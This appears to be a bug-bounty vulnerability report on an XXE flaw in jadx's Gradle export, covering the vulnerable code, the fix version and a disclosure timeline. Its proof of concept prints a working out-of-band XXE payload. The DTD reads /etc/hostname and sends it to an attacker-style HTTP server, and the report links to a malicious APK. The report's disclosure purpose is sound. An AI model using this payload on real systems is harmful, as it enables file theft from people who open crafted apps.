Improper Restriction of XML External Entity Reference in skylot/jadx

Valid

Reported on

Jan 12th 2022


Description

The parseXml() function in ExportGradleProject is not secured against XXE because it does not enable the disallow-doctype-decl feature on its DocumentBuilderFactory; therefore JADX is vulnerable to XXE when it parses a malicious AndroidManifest.xml while exporting an Android app to Gradle. In

https://github.com/skylot/jadx/blob/f9bf27579e3ad5f89239ea9f571e8b50739e8920/jadx-core/src/main/java/jadx/core/export/ExportGradleProject.java#L142L147

DocumentBuilder builder = DocumentBuilderFactory.newInstance().newDocumentBuilder();
Document document = builder.parse(new InputSource(new StringReader(xmlContent)));

the DocumentBuilderFactory does not have the disallow-doctype-decl feature set to true, so the parser processes DOCTYPE declarations and external entities, leaving it vulnerable to XXE.

Proof Of Concept

1: Build an Android app with the following AndroidManifest.xml. You can use my built APK with a malicious AndroidManifest.xml file https://drive.google.com/file/d/1D4QBk-YJH8xadGv1vpz9rBTDN9X43pUC/view?usp=sharing in order to test this.

<?xml version="1.0" encoding="utf-8" standalone="no"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://127.0.0.1/malicious.dtd"> %xxe;]>
... [---malicious APK continued here---]

2: Open a new terminal and create a file named malicious.dtd with the following contents

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://10.0.2.4/?x=%file;'>">
%eval;
%exfiltrate;

3: In the same terminal as step 2, start an HTTP server (which mimics an attacker server) and leave it running

~ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/)

4: Now, export the APK to Gradle

jadx -e /path/to/malicious/apkfile.apk

5: The HTTP server (which mimics an attacker server) will receive the contents of the victim's /etc/hostname

➜  ~ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.0.2.4 - - [12/Jan/2022 14:36:41] "GET /malicious.dtd HTTP/1.1" 200 -
10.0.2.4 - - [12/Jan/2022 14:36:41] "GET /?x=testserver HTTP/1.1" 200 -

Impact

This vulnerability enables XXE (information disclosure) when users are tricked into exporting a malicious Android app with a crafted AndroidManifest.xml to Gradle.

Patch

https://github.com/Haxatron/jadx/commit/c6a78c0d6dc990a4a0f8962d51823aa6ca3aefd2

Timeline

We are processing your report and will contact the skylot/jadx team within 24 hours. (a year ago)
haxatron modified the report (a year ago)
haxatron modified the report (a year ago)
haxatron modified the report (a year ago)
haxatron modified the report (a year ago)
We created a GitHub Issue asking the maintainers to create a SECURITY.md (a year ago)
haxatron submitted a (a year ago)
haxatron modified the report (a year ago)
skylot validated this vulnerability (a year ago)
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
skylot marked this as fixed in 1.3.2 with commit d22db3 (a year ago)
haxatron has been awarded the fix bounty
This vulnerability will not receive a CVE

haxatron (Researcher), a year ago:

If anyone is viewing the report and still wants to test this, I have moved the payload to GitHub https://github.com/Haxatron/CVE-2022-0219/blob/main/payload.apk
